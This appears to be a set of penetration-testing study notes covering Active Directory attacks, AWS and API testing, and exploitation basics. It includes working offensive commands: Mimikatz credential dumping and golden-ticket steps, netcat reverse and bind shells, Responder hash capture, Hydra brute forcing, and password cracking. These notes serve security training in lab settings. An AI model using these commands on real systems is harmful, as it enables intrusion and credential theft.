| hashcat -m 13100 hashes.txt rockyou.txt 133 | ``` 134 | 135 | ### Mitigation 136 | 137 | #### Strategies 138 | 139 | * Strong Passwords 140 | * Least privileges 141 | 142 | ## GPP / cPassword Attacks 143 | 144 | ### GPP / cPassword Attacks Overview 145 | 146 | Group Policy Preferences (GPP) AKA MS14-025 147 | 148 | * Group Policy Preferences allowed admins to created policies using embedded credentials 149 | * These credentials were encrypted and placed in a "cPassword" 150 | * The key was accidentally released 151 | * Patched in MS14-025, but doesn't prevent previous uses 152 | 153 | Can check using `smb_enum_gpp` Metasploit module 154 | 155 | #### Resource 156 | 157 | [https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/](https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/) 158 | 159 | ### Abusing GPP 160 | 161 | Example using Active on HackTheBox. 162 | 163 | #### Part 1 164 | 165 | 1. Downloaded files from SMB 166 | 2. Found Groups.xml with `name-active.htb\SVC_TGS` and the `cpassword=""` 167 | 3. Execute `gpp-decrypt` \ 168 | 169 | #### Part 2 170 | 171 | 1. Tried `psexec.py active.htb/svc_tgs:@` but failed... 172 | 2. Then `GetUserSPNs.py active.htb/svc_tgs: -dc-ip -request` 173 | 1. Returns a service ticket which we can copy and crack 174 | 1. hashcat -m 13100 hashes.txt rockyou.txt -O 175 | 3. Finally psexec.py active.htb/Administrator:\@\ 176 | 177 | ## URL File Attacks 178 | 179 | Requires compromised user account of an open file share. 180 | 181 | Create a file: 182 | 183 | ``` 184 | [InternetShortcut] 185 | URL=blah 186 | WorkingDirectory=blah 187 | IconFile=\%USERNAME%.icon 188 | IconIndex=1Mimikatz 189 | ``` 190 | 191 | Save file at "@test.url". Needs '@' and '.url' which will ensure it ends up at the top of the folder. 192 | 193 | Then place it on a file share. 194 | 195 | Then run Responder: `responder -I eth0 -v` 196 | 197 | Now when a user navigates to the file share, responder will capture hashes. 198 | 199 | #### Resources 200 | 201 | [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share) 202 | 203 | ## Mimikatz 204 | 205 | ### Overview 206 | 207 | #### What is Mimikatz? 208 | 209 | * Tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks 210 | * Dumps credentials stored in memory 211 | * Just a few attacks: Credential dumping, Pass-the-hash, Over-pass-the-hash, Pass-the-ticket, Golden Ticket, Silver Ticket 212 | 213 | ### Credential Dumping 214 | 215 | Assuming we have already compromised the Domain Controller 216 | 217 | ```powershell 218 | mimikatz 219 | privilege::debug 220 | sekurlsa::logonpasswords # Check for logon users passwords in memory 221 | lsadump::sam # Try to dump the SAM 222 | lsadump::lsa /patch # Try to dump the LSA 223 | ``` 224 | 225 | ## Golden Ticket Attacks 226 | 227 | ```powershell 228 | mimikatz 229 | privilege::debug 230 | lsadump::lsa /inject /name:krbtgt 231 | # Copy the SID of the domain ex: S-1-5-21-xxxx-xxxx-xxxx 232 | # Copy the NTLM Hash of the kerberos TGT account 233 | kerberos::golden /User:Administrator /domain:marvel.local /sid: /krbtgt: /id:500 /ptt 234 | # Look for "Golden ticket for ... successfully submitted for current session 235 | misc::cmd # Start a command prompt utilizing session using golden ticket we created 236 | dir \\THEPUNISHER\c$ # We have access to this machine 237 | # And then can try psexec.exe \\THEPUNISHER cmd.exe 238 | ``` 239 | 240 | ## Additional Resources 241 | 242 | Active Directory Security Blog: [https://adsecurity.org/](https://adsecurity.org/) 243 | 244 | Harmj0y Blog: [http://blog.harmj0y.net/](http://blog.harmj0y.net/) 245 | 246 | Pentester Academy Active Directory: [https://www.pentesteracademy.com/activedirectorylab](https://www.pentesteracademy.com/activedirectorylab) 247 | 248 | Pentester Academy Red Team Labs: [https://www.pentesteracademy.com/redteamlab](https://www.pentesteracademy.com/redteamlab) 249 | 250 | eLS PTX: [https://elearnsecurity.com/product/ecptx-certification/](https://elearnsecurity.com/product/ecptx-certification/) 251 | -------------------------------------------------------------------------------- /active-directory/peh/post-compromise-enumeration.md: -------------------------------------------------------------------------------- 1 | # Post-Compromise Enumeration 2 | 3 | ## Domain Enumeration with PowerView 4 | 5 | #### Setup 6 | 7 | ```powershell 8 | C:\Users\fcastle\Desktop>powershell -ep bypass 9 | Windows PowerShell 10 | Copyright (C) Microsoft Corporation. All rights reserved. 11 | 12 | PS C:\Users\fcastle\Desktop> . .\PowerView.ps1 13 | ``` 14 | 15 | #### Get-NetDomain 16 | 17 | Get information about the Domain 18 | 19 | ```powershell 20 | PS C:\Users\fcastle\Desktop> Get-NetDomain 21 | 22 | Forest : MARVEL.local 23 | DomainControllers : {HYDRA-DC.MARVEL.local} 24 | Children : {} 25 | DomainMode : Unknown 26 | DomainModeLevel : 7 27 | Parent : 28 | PdcRoleOwner : HYDRA-DC.MARVEL.local 29 | RidRoleOwner : HYDRA-DC.MARVEL.local 30 | InfrastructureRoleOwner : HYDRA-DC.MARVEL.local 31 | Name : MARVEL.local 32 | ``` 33 | 34 | #### Get-NetDomainController 35 | 36 | Get specific Domain Controllers 37 | 38 | ```powershell 39 | PS C:\Users\fcastle\Desktop> Get-NetDomainController 40 | 41 | Forest : MARVEL.local 42 | CurrentTime : 1/20/2022 1:57:31 AM 43 | HighestCommittedUsn : 53277 44 | OSVersion : Windows Server 2019 Standard Evaluation 45 | Roles : {SchemaRole, NamingRole, PdcRole, RidRole...} 46 | Domain : MARVEL.local 47 | IPAddress : 192.168.72.137 48 | SiteName : Default-First-Site-Name 49 | SyncFromAllServersCallback : 50 | InboundConnections : {} 51 | OutboundConnections : {} 52 | Name : HYDRA-DC.MARVEL.local 53 | Partitions : {DC=MARVEL,DC=local, CN=Configuration,DC=MARVEL,DC=local, CN=Schema,CN=Configuration,DC=MARVEL,DC=local, DC=DomainDnsZones,DC=MARVEL,DC=local...} 54 | ``` 55 | 56 | #### Get-DomainPolicy 57 | 58 | Get all policies in the Domain 59 | 60 | ```powershell 61 | PS C:\Users\fcastle\Desktop> Get-DomainPolicy 62 | 63 | Name Value 64 | ---- ----- 65 | Kerberos Policy {MaxTicketAge, MaxServiceAge, MaxClockSkew, MaxRenewAge...} 66 | System Access {MinimumPasswordAge, MaximumPasswordAge, LockoutBadCount, PasswordComplexity...} 67 | Version {Revision, signature} 68 | Registry Values {MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash} 69 | Unicode {Unicode} 70 | ``` 71 | 72 | ```powershell 73 | PS C:\Users\fcastle\Desktop> (Get-DomainPolicy)."System Access" 74 | Name Value 75 | ---- ----- 76 | MinimumPasswordAge {1} 77 | MaximumPasswordAge {42} 78 | LockoutBadCount {0} 79 | PasswordComplexity {1} 80 | RequireLogonToChangePassword {0} 81 | LSAAnonymousNameLookup {0} 82 | ForceLogoffWhenHourExpire {0} 83 | PasswordHistorySize {24} 84 | ClearTextPassword {0} 85 | MinimumPasswordLength {7} 86 | ``` 87 | 88 | #### Get-NetUser 89 | 90 | Get a bunch of user details 91 | 92 | ```powershell 93 | PS C:\Users\fcastle\Desktop> Get-NetUser 94 | ... 95 | logoncount : 0 96 | badpasswordtime : 12/31/1600 4:00:00 PM 97 | description : Admin 98 | distinguishedname : CN=Tony Stark,CN=Users,DC=MARVEL,DC=local 99 | objectclass : {top, person, organizationalPerson, user} 100 | displayname : Tony Stark 101 | userprincipalname : tstark@MARVEL.local 102 | name : Tony Stark 103 | objectsid : S-1-5-21-676298576-3461144594-1832349395-1107 104 | samaccountname : tstark 105 | admincount : 1 106 | codepage : 0 107 | samaccounttype : 805306368 108 | whenchanged : 6/18/2020 12:53:23 AM 109 | accountexpires : 9223372036854775807 110 | countrycode : 0 111 | adspath : LDAP://CN=Tony Stark,CN=Users,DC=MARVEL,DC=local 112 | instancetype : 4 113 | objectguid : 3efcaafd-dc9c-485e-8abf-a21b8a44d5d0 114 | lastlogon : 12/31/1600 4:00:00 PM 115 | lastlogoff : 12/31/1600 4:00:00 PM 116 | objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=MARVEL,DC=local 117 | dscorepropagationdata : {6/18/2020 12:49:06 AM, 1/1/1601 12:00:00 AM} 118 | givenname : Tony 119 | memberof : {CN=Group Policy Creator Owners,OU=Groups,DC=MARVEL,DC=local, CN=Domain Admins,OU=Groups,DC=MARVEL,DC=local, CN=Enterprise Admins,OU=Groups,DC=MARVEL,DC=local, CN=Schema 120 | Admins,OU=Groups,DC=MARVEL,DC=local...} 121 | whencreated : 6/18/2020 12:48:27 AM 122 | sn : Stark 123 | badpwdcount : 0 124 | cn : Tony Stark 125 | useraccountcontrol : 66048 126 | usncreated : 16443 127 | primarygroupid : 513 128 | pwdlastset : 6/17/2020 5:48:27 PM 129 | usnchanged : 16498 130 | ... 131 | ``` 132 | 133 | ```powershell 134 | PS C:\Users\fcastle\Desktop> Get-NetUser | select cn 135 | cn 136 | -- 137 | Administrator 138 | Guest 139 | krbtgt 140 | Frank 141 | Castle 142 | Tony Stark 143 | Wade Wilson 144 | SQL Service 145 | ``` 146 | 147 | #### Get-UserProperty 148 | 149 | ```powershell 150 | PS C:\Users\fcastle\Desktop> Get-UserProperty -Properties pwdlastset 151 | 152 | name pwdlastset 153 | ---- ---------- 154 | Administrator 6/17/2020 4:57:17 PM 155 | Guest 12/31/1600 4:00:00 PM 156 | krbtgt 6/17/2020 5:11:21 PM 157 | Frank Castle 6/17/2020 5:46:31 PM 158 | Tony Stark 6/17/2020 5:48:27 PM 159 | Wade Wilson 6/17/2020 5:49:38 PM 160 | SQL Service 6/17/2020 5:52:09 PM 161 | ``` 162 | 163 | #### Get-NetComputer 164 | 165 | Get the computers in the domain. 166 | 167 | ```powershell 168 | PS C:\Users\fcastle\Desktop> Get-NetComputer 169 | HYDRA-DC.MARVEL.local 170 | PUNISHER.MARVEL.local 171 | DEADPOOL.MARVEL.local 172 | ``` 173 | 174 | ```powershell 175 | PS C:\Users\fcastle\Desktop> Get-NetComputer -FullData 176 | ... 177 | ``` 178 | 179 | #### Get-NetGroup 180 | 181 | Get the groups 182 | 183 | ```powershell 184 | PS C:\Users\fcastle\Desktop> Get-NetGroup 185 | ... 186 | ``` 187 | 188 | #### Get-NetGroupMember 189 | 190 | Get members of a group 191 | 192 | ```powershell 193 | PS C:\Users\fcastle\Desktop> Get-NetGroupMember -GroupName "Domain Admins" 194 | ``` 195 | 196 | #### Invoke-ShareFinder 197 | 198 | Get a list of active shares 199 | 200 | ```powershell 201 | PS C:\Users\fcastle\Desktop> Invoke-ShareFinder 202 | \\HYDRA-DC.MARVEL.local\ADMIN$ - Remote Admin 203 | \\HYDRA-DC.MARVEL.local\C$ - Default share 204 | \\HYDRA-DC.MARVEL.local\hackme - 205 | \\HYDRA-DC.MARVEL.local\IPC$ - Remote IPC 206 | \\HYDRA-DC.MARVEL.local\NETLOGON - Logon server share 207 | \\HYDRA-DC.MARVEL.local\SYSVOL - Logon server share 208 | \\PUNISHER.MARVEL.local\ADMIN$ - Remote Admin 209 | \\PUNISHER.MARVEL.local\C$ - Default share 210 | \\PUNISHER.MARVEL.local\IPC$ - Remote IPC 211 | \\PUNISHER.MARVEL.local\Share - 212 | ``` 213 | 214 | #### Get-NetGPO 215 | 216 | Get the group policies of the domain 217 | 218 | ```powershell 219 | PS C:\Users\fcastle\Desktop> Get-NetGPO 220 | ... 221 | ``` 222 | 223 | ```powershell 224 | PS C:\Users\fcastle\Desktop> Get-NetGPO |select displayname, whenchanged 225 | 226 | displayname whenchanged 227 | ----------- ----------- 228 | Default Domain Policy 6/18/2020 12:20:10 AM 229 | Default Domain Controllers Policy 6/18/2020 12:10:44 AM 230 | Disable Windows Defender 6/18/2020 1:00:19 AM 231 | ``` 232 | 233 | #### Cheat Sheet 234 | 235 | [https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) 236 | 237 | ## Grabbing Data with Invoke-Bloodhound 238 | 239 | > Copied over SharpHound.ps1 to the Windows target machine 240 | 241 | #### Setup 242 | 243 | ```powershell 244 | C:\Users\fcastle\Desktop>powershell -ep bypass 245 | Windows PowerShell 246 | Copyright (C) Microsoft Corporation. All rights reserved. 247 | 248 | PS C:\Users\fcastle\Desktop> . .\SharpHound.ps1 249 | ``` 250 | 251 | #### Execution 252 | 253 | ```powershell 254 | PS C:\Users\fcastle\Desktop> Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName file.zip 255 | ``` 256 | 257 | Copy the zip file locally to Kali and then upload into Bloodhound. 258 | 259 | ## Enumerating Domain Data with Bloodhound 260 | 261 | #### Queries 262 | 263 | * Find all Domain Admins 264 | * Find Shortest Paths to Domain Admins 265 | * Shortest Paths to High Value Targets 266 | 267 | #### On Graph Relationship 268 | 269 | Access Boxes that have Domain Admin logged in (Green) 270 | 271 | * HasSession 272 | * Token impersonation; Mimikatz 273 | * MemberOf 274 | * Group that the account belongs to 275 | -------------------------------------------------------------------------------- /apis/methodology/README.md: -------------------------------------------------------------------------------- 1 | # Methodology 2 | 3 | ## Methodologies 4 | 5 | * [https://github.com/dsopas/MindAPI](https://github.com/dsopas/MindAPI) 6 | * [https://github.com/shieldfy/API-Security-Checklist](https://github.com/shieldfy/API-Security-Checklist) 7 | * [https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting) 8 | 9 | ## Recon 10 | 11 | ## Attack 12 | -------------------------------------------------------------------------------- /apis/resources.md: -------------------------------------------------------------------------------- 1 | # Resources 2 | 3 | ## APIs / GraphQL 4 | 5 | ### Blogs 6 | 7 | * [https://labs.detectify.com/2021/08/31/go-fuzz-yourself-how-to-find-more-vulnerabilities-in-apis-through-fuzzing-whitepaper-download/](https://labs.detectify.com/2021/08/31/go-fuzz-yourself-how-to-find-more-vulnerabilities-in-apis-through-fuzzing-whitepaper-download/) 8 | * [https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration](https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration) 9 | * [https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/](https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/) 10 | 11 | ### Books 12 | 13 | * [https://nostarch.com/hacking-apis](https://nostarch.com/hacking-apis) 14 | * [https://www.amazon.com/dp/1718502443?\&linkCode=sl1\&tag=networkexpe08-20\&linkId=f60ab6caa0692ff6f974fd83b8a4ea52\&language=en\_US\&ref\_=as\_li\_ss\_tl](https://www.amazon.com/dp/1718502443?\&linkCode=sl1\&tag=networkexpe08-20\&linkId=f60ab6caa0692ff6f974fd83b8a4ea52\&language=en\_US\&ref\_=as\_li\_ss\_tl) 15 | * [https://nostarch.com/black-hat-graphql](https://nostarch.com/black-hat-graphql) (GraphQL) 16 | 17 | ### Content 18 | 19 | * InsiderPhD - [https://www.youtube.com/c/InsiderPhD](https://www.youtube.com/c/InsiderPhD) 20 | * Alissa Knight - [https://www.youtube.com/alissaknight](https://www.youtube.com/alissaknight) 21 | * Tools and Resources: [https://github.com/arainho/awesome-api-security](https://github.com/arainho/awesome-api-security) 22 | 23 | ### Courses 24 | 25 | * [https://university.apisec.ai/](https://university.apisec.ai/) 26 | * [https://www.udemy.com/course/uncle-rats-api-security-testing-guide](https://www.udemy.com/course/uncle-rats-api-security-testing-guide) 27 | * [http://hackxpert.com/API-testing.php](http://hackxpert.com/API-testing.php) 28 | 29 | ### Labs 30 | 31 | {% tabs %} 32 | {% tab title="HackTheBox" %} 33 | * [ ] AdmirerToo 34 | * [ ] Backend 35 | * [ ] BackendTwo 36 | * [ ] Catch 37 | * [ ] Cereal (graphql) 38 | * [ ] Craft 39 | * [ ] Devzat 40 | * [ ] EarlyAccess 41 | * [ ] Feline 42 | * [ ] Flujab 43 | * [ ] HackBack 44 | * [ ] Help (graphql) 45 | * [ ] Intense 46 | * [ ] JSON 47 | * [ ] Luke 48 | * [ ] Multimaster 49 | * [ ] Node 50 | * [ ] Oouch 51 | * [ ] Oz 52 | * [ ] Perspective 53 | * [ ] PivotAPI 54 | * [ ] Player2 55 | * [ ] Postman 56 | * [ ] Ransom 57 | * [ ] Secret 58 | * [ ] Wall 59 | * [ ] Zipper 60 | {% endtab %} 61 | 62 | {% tab title="TryHackMe" %} 63 | * [x] [https://tryhackme.com/room/owaspapisecuritytop105w](https://tryhackme.com/room/owaspapisecuritytop105w) 64 | * [x] [https://tryhackme.com/room/owaspapisecuritytop10d0](https://tryhackme.com/room/owaspapisecuritytop10d0) 65 | * [ ] [https://tryhackme.com/room/bookstoreoc](https://tryhackme.com/room/bookstoreoc) 66 | * [ ] [https://tryhackme.com/room/carpediem1](https://tryhackme.com/room/carpediem1) (graphql) 67 | * [ ] [https://tryhackme.com/room/idor](https://tryhackme.com/room/idor) (idor) 68 | {% endtab %} 69 | {% endtabs %} 70 | 71 | ### Vulnerable Apps 72 | 73 | * [https://github.com/roottusk/vapi](https://github.com/roottusk/vapi) 74 | * [https://github.com/OWASP/crAPI](https://github.com/OWASP/crAPI) 75 | * [https://github.com/erev0s/VAmPI](https://github.com/erev0s/VAmPI) 76 | * [https://github.com/InsiderPhD/Generic-University](https://github.com/InsiderPhD/Generic-University) 77 | * [https://github.com/snoopysecurity/dvws-node](https://github.com/snoopysecurity/dvws-node) 78 | * [https://github.com/DevSlop/Pixi](https://github.com/DevSlop/Pixi) 79 | * [https://github.com/marmicode/websheep](https://github.com/marmicode/websheep) 80 | * [https://github.com/optiv/rest-api-goat](https://github.com/optiv/rest-api-goat) 81 | * [https://github.com/payatu/Tiredful-API](https://github.com/payatu/Tiredful-API) 82 | -------------------------------------------------------------------------------- /cloud/aws/README.md: -------------------------------------------------------------------------------- 1 | # AWS 2 | 3 | ## Basic Concepts 4 | 5 | #### AWS Pentesting Policy 6 | 7 | [https://aws.amazon.com/security/penetration-testing/](https://aws.amazon.com/security/penetration-testing/) 8 | 9 | #### AWS Keys 10 | 11 | Comprised of access ID and the secret key itself. 12 | 13 | * Create Key: 14 | * IAM --> Users --> Create access key 15 | * View Keys: 16 | * IAM --> Users --> Security Credentials --> Access key ID 17 | 18 | Find Keys: 19 | 20 | 
# Linux Location
 21 | ~/.aws/credentials
 22 | # Windows Location
 23 | %USERPROFILE%/.aws/credentials
 24 | # Typical Entry
 25 | [default]
 26 | aws_access_key_id =
 27 | aws_secret_access_key =
 28 |
29 | 30 | Check for Google dorks using ExploitDB. Ex: searching on `aws` 31 | 32 | ### IAM (Identity and Access Management) Security Issues 33 | 34 | * Create User: 35 | * IAM --> Users --> add Users 36 | * Potential Issues 37 | * Weak password security (password strength) 38 | * Lack of MFA 39 | * Rotating Keys / Key revocation/deactivation 40 | * Too many permissions / privileges (least privileges) 41 | 42 | ### S3 (Simple Storage Service) 43 | 44 | * Create a bucket 45 | * S3 --> Buckets --> Create bucket 46 | * Potential Issues 47 | * Public buckets 48 | * Permissions 49 | * Bucket versioning 50 | 51 | Find Buckets: 52 | 53 | ```bash 54 | nslookup flaws.cloud 55 | Address: 52.218.245.11 56 | 57 | # Reverse lookup 58 | nslookup 52.218.245.11 59 | 11.245.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com 60 | ``` 61 | 62 | Can also check website page source for S3 bucket URLs. 63 | 64 | ### EC2 (Elastic Compute Cloud) 65 | 66 | * After OS initial installation, update the OS/install patches (patch management) 67 | * Update 3rd party software and services (email server, web server, etc.) 68 | * AMI (Amazon Machine Image) - supported and maintained image provided by AWS that provides the information required to launch an instance 69 | * Obtain the credentials for their IAM roles from the metadata service at 169.254.169.254 70 | 71 | ### Lambda 72 | 73 | AWS Lambda is a serverless, event-driven compute service that lets you run code for virtually any type of application or backend service without provisioning or managing servers. 74 | 75 | * Make sure the code that is passed to it is properly sanitized 76 | * Security misconfigurations such as permissions settings for other accounts 77 | * Third partly libraries that are used 78 | * Potential DoS if code takes input from users 79 | * Obtains credentials from environmental variables. 80 | 81 | ### ARNs (Amazon Resource Names) 82 | 83 | A way to uniquely identify AWS resources. We require an ARN when you need to specify a resource unambiguously across all of AWS 84 | 85 | * Can potentially leak information if such details can be accessed 86 | * Be familiar with the Format and Paths 87 | 88 | ## Tools 89 | 90 | ### GrayhatWarfare 91 | 92 | Search Public Buckets: [https://buckets.grayhatwarfare.com/](https://buckets.grayhatwarfare.com/) 93 | 94 | ### AWS CLI 95 | 96 | ```bash 97 | aws configure # Set Access Key ID, Secret Acces Key, Region name, output format 98 | aws configure --profile # Set same as above for specific profile 99 | aws --profile 100 | tail .aws/credentials # Check the credentials files 101 | aws help 102 | aws iam 103 | aws s3 104 | ``` 105 | 106 | ### Pacu 107 | 108 | The Open Source AWS Exploitation Framework 109 | 110 | [https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/) 111 | 112 | ```bash 113 | pacu # Start up pacu 114 | # Create/Select a session 115 | Pacu () > help 116 | Pacu () > import_keys # Import existing keys 117 | 118 | ``` 119 | 120 | ### AWS Bucket Dump 121 | 122 | Security Tool to Look For Interesting Files in S3 Buckets 123 | 124 | [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) 125 | 126 | ```bash 127 | # Example 128 | python3 AWSBucketDump.py -l BucketNmes.txt -g interesting_Keywords.txt 129 | ``` 130 | 131 | #### 132 | 133 | ### 134 | 135 | ### 136 | 137 | {% hint style="info" %} 138 | References: 139 | 140 | * ITProTV - Intro to AWS Penetration Testing 141 | * https://www.linkedin.com/learning/introduction-to-aws-penetration-testing/ 142 | * 143 | {% endhint %} 144 | -------------------------------------------------------------------------------- /exploitation/exploitation-basics.md: -------------------------------------------------------------------------------- 1 | # Exploitation Basics 2 | 3 | ## Reverse Shells vs Bind Shells 4 | 5 | ### Reverse Shell 6 | 7 | A victim connects to us. 8 | 9 | #### Attacker 10 | 11 | ```bash 12 | nc -lvnp 4444 # Listening 13 | ``` 14 | 15 | #### Target 16 | 17 | ```bash 18 | nc -e /bin/sh # Connecting 19 | ``` 20 | 21 | ### Bind Shell 22 | 23 | We connect to the victim. 24 | 25 | #### Attacker 26 | 27 | ```bash 28 | nc 4444 # Connecting 29 | ``` 30 | 31 | #### Target 32 | 33 | ```bash 34 | nc -lvnp 4444 -e /bin/sh # Listening 35 | ``` 36 | 37 | ## Staged vs Non-Staged Payloads 38 | 39 | ### Staged 40 | 41 | * Sends payload in stages 42 | * Can be less stable 43 | * Example: `windows/meterpreter/reverse_tcp` 44 | 45 | ### Non-staged 46 | 47 | * Sends exploit shellcode all at once 48 | * Larger in size and won't always work 49 | * Example: `windows/meterpreter_reverse_tcp` 50 | 51 | ## Gaining Root with Metasploit 52 | 53 | ### Example 54 | 55 | ```bash 56 | searchsploit samba 2.2 57 | # Found a 'trans2open' vulnerability with (Metasploit) mentioned 58 | msfconsole 59 | search trans2open 60 | use exploit/linux/samba/trans2open 61 | set RHOSTS 62 | run / exploit 63 | # Session kept opening and closing... 64 | # Looking at the options we see the payload linux/x86/meterpreter/reverse_tcp 65 | # Since this didn't work we can change it to a Non-staged payload 66 | set payload linux/x86/shell_reverse_tcp 67 | run / exploit 68 | ``` 69 | 70 | ## Manual Exploitation 71 | 72 | ### Example 73 | 74 | Finding an Apache mod\_ssl < 2.8.7 vulnerability 75 | 76 | Used Google to identify there is an exploit called OpenLuck on GitHub 77 | 78 | Followed the steps on GitHub to download, install, compile, and run the exploit. 79 | 80 | ## Brute Force Attacks 81 | 82 | ### Tools 83 | 84 | #### Hydra 85 | 86 | ```bash 87 | hydra -l -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh:// -t 4 88 | ``` 89 | 90 | #### Metasploit 91 | 92 | ```bash 93 | search ssh 94 | use auxiliary/scanner/ssh/ssh_login 95 | set USERNAME root 96 | set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt 97 | set RHOSTS 98 | run 99 | ``` 100 | 101 | ## Credential Stuffing and Password Spraying 102 | 103 | ### What is Credential Stuffing? 104 | 105 | Injecting breached account credentials in hopes of account takeover by testing large volumes of stolen usernames and passwords across multiple sites. 106 | 107 | ### What is Password Spraying? 108 | 109 | Injecting breached account credentials in hopes of account takeover by attempting to access a large number of sites using known account identifiers (usernames) with a few commonly used passwords. 110 | 111 | ## Metasploit Unleashed 112 | 113 | {% embed url="https://www.offensive-security.com/metasploit-unleashed" %} 114 | 115 | ## Armitage 116 | 117 | _Armitage_ is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit. 118 | 119 | {% embed url="https://www.offensive-security.com/metasploit-unleashed/armitage" %} 120 | -------------------------------------------------------------------------------- /information-gathering-reconnaissance/passive-reconnaissance.md: -------------------------------------------------------------------------------- 1 | # Passive Reconnaissance 2 | 3 | ## Passive Reconnaissance Overview 4 | 5 | ### Physical/Social 6 | 7 | #### Location Information 8 | 9 | * Satellite images, Drone recon, Building layout (badge readers, break areas, security, fencing) 10 | 11 | #### Job Information 12 | 13 | * Employees (name, job title, phone number, manager, etc.) 14 | * Pictures (badge photos, desk photos, computer photos, etc.) 15 | 16 | ### Web/Host 17 | 18 | #### Target Validation 19 | 20 | * WHOIS, nslookup, dnsrecon 21 | 22 | #### Finding Subdomains 23 | 24 | * Google Fu, dig, Nmap, Sublist3r, Bluto, crt.sh, etc. 25 | 26 | #### Fingerprinting 27 | 28 | * Nmap, Wappalyzer, WhatWeb, BuiltWith, Netcat 29 | 30 | #### Data Breaches 31 | 32 | * HaveIBeenPwned, Breach-Parse, WeLeakInfo 33 | 34 | ## Identify Our Target 35 | 36 | Bugcrowd. Rules of Engagement; Make sure your in scope, noting the out of scope items. 37 | 38 | ## Discovering Email Addresses 39 | 40 | ### Tools 41 | 42 | * hunter.io 43 | * phonebook.cz 44 | * voilanorbert.com 45 | * clearbit connect Chrome extension 46 | * emailhippo - tools.verifyemailaddress.io 47 | * email-chekcer.net/validate 48 | 49 | ## Breached Credentials 50 | 51 | ### Gathering Breached Credentials 52 | 53 | #### Breach-Parse 54 | 55 | Tool on GitHub by TCM that uses breached username and password credentials and searching on a specific domain names to limit the accounts for that domain. Credential Stuffing. 56 | 57 | ### Hunting Breached Credentials 58 | 59 | #### DeHashed 60 | 61 | Payed service at dehashed.com. 62 | 63 | ## Hunting Subdomains 64 | 65 | ### Tools 66 | 67 | * Sublist3r 68 | * `sublist3r -d tesla.com` 69 | * crt.sh (Website) 70 | * OWASP Amass 71 | * httprobe 72 | 73 | ## Identifying Website Technologies 74 | 75 | ### Tools 76 | 77 | * builtwith.com 78 | * Wappalyzer 79 | * whatweb 80 | * `whatweb https://tesla.com` 81 | 82 | ## Information Gathering with Burp Suite 83 | 84 | Intercept website traffic. View/modify requests. View Target details. 85 | 86 | ## Google Fu 87 | 88 | ### Examples 89 | 90 | * `site:tesla.com -www` 91 | * `site:tesla.com filetype:pdf` 92 | 93 | ### Resources 94 | 95 | {% embed url="https://ahrefs.com/blog/google-advanced-search-operators" %} 96 | 97 | {% embed url="https://moz.com/learn/seo/search-operators" %} 98 | 99 | ## Utilizing Social Media 100 | 101 | ### Websites 102 | 103 | * LinkedIn 104 | * Twitter 105 | * Facebook 106 | 107 | ### Look For 108 | 109 | * Pictures 110 | * Badge photos 111 | * Desk pictures 112 | * People and their information 113 | 114 | ## OSINT Fundamentals 115 | -------------------------------------------------------------------------------- /misc/containers.md: -------------------------------------------------------------------------------- 1 | # Containers 2 | 3 | ## Enumeration 4 | 5 | [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Container%20-%20Docker%20Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Container%20-%20Docker%20Pentest.md) 6 | 7 | ### deepce 8 | 9 | Like LinEnum.sh for containers. 10 | 11 | [https://github.com/stealthcopter/deepce](https://github.com/stealthcopter/deepce) 12 | -------------------------------------------------------------------------------- /misc/interesting-files.md: -------------------------------------------------------------------------------- 1 | # Interesting Files 2 | 3 | ## File Types 4 | 5 | ### zip 6 | 7 | ```bash 8 | # Try to unzip file 9 | unzip filename.zip 10 | # If a passwowrd is needed, attempt to crack it 11 | zip2john filename.zip >> filename.zip.hash 12 | john filename.zip.hash --wordlist=/usr/share/wordlist/rockyou.txt 13 | ``` 14 | 15 | ### rar 16 | 17 | ```bash 18 | unrar e filename.rar 19 | rar2john filename.rar >> filename.rar.hash 20 | john filename.rar.hash --wordlist=/usr/share/wordlist/rockyou.txt 21 | ``` 22 | 23 | ### pfx 24 | 25 | ```bash 26 | # Try to view file info 27 | openssl pkcs12 -in filename.pfx -info 28 | # If a password is needed, attempt to crack it 29 | pfx2john filename.pfx >> filename.pfx.hash 30 | john filename.pfx.hash --wordlist=/usr/share/wordlist/rockyou.txt 31 | ``` 32 | 33 | After putting in the password it will extract certificates and private keys. 34 | 35 | ```bash 36 | # Extract the keys 37 | openssl pkcs12 -in filename.pfx -nocerts -out key.pem -nodes 38 | # Extract the certificates 39 | openssl pkcs12 -in filename.pfx -nokeys -out key.cert 40 | ``` 41 | 42 | If the WinRM port (5985,5986) is open it could be possible to login to the target using Evil-WinRm. 43 | 44 | ```bash 45 | evil-winrm -S -i -c key.cert -k key.pem 46 | ``` 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /misc/linux.md: 